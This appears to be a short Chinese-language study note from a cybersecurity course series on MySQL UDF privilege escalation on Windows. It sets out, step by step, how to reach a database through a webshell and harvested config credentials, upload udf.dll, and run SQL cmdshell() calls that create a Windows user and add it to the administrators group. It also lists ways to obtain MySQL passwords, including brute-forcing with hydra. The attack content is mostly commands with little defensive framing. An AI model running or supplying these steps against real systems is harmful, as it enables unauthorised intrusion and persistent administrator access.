网络安全-Day49-MYsql UDF提权

mysql udf提权操作

提示：上传udf.dll

小于mysql5.1版本

C:\\WINDOWS\\udf.dll 或 C:\\WINDOWS\\system32\\udf.dll

等于mysql5.1版本

%mysql%\\plugin\\udf.dll 用 select @@plugin_dir 查询plugin路径

默认 C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll

1、拿到shell后，下载网站配置文件，从中获取数据库信息（conn、config、data、sql、common、inc）

2、使用菜刀本地连接数据库

3、获取root账号密码

一、基于安全考虑root账户一般只能本地访问，但是在开发过程中可能需要打开root的远程访问权限。下面是基本的步骤：1、登录到mysql中，为root进行远程访问的授权，执行下面的命令： mysql>

mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";

mysql> flush privileges;

4、通过shell查看路径（路径不有lib、plugin这两个文件夹的自己加上去）

5、执行成功新增一个udf.dll文件

6、查询用户（select cmdshell('net user');）

7、创建用户（select cmdshell('net user root 1234 /add');）

8、查询用户是否新增成功（select cmdshell('net user');）

9、查看root账户，当前权限（select cmdshell('net user root');）

10、把root账户加入管理组（select cmdshell('net localgroup administrators root /add');）

赋权后查询

11、查看当前账户权限（select cmdshell('whoami');）

获取mysql密码的方法

1、查看网站配置文件

如:conn、config、data、sql、common、inc等

2.查看数据库安装路径下的mysql文件

安装目录为/data/mysql/user.myd和user.myi

3.通过暴力破解得到（hscan、Bruter、hydra、脚本木马）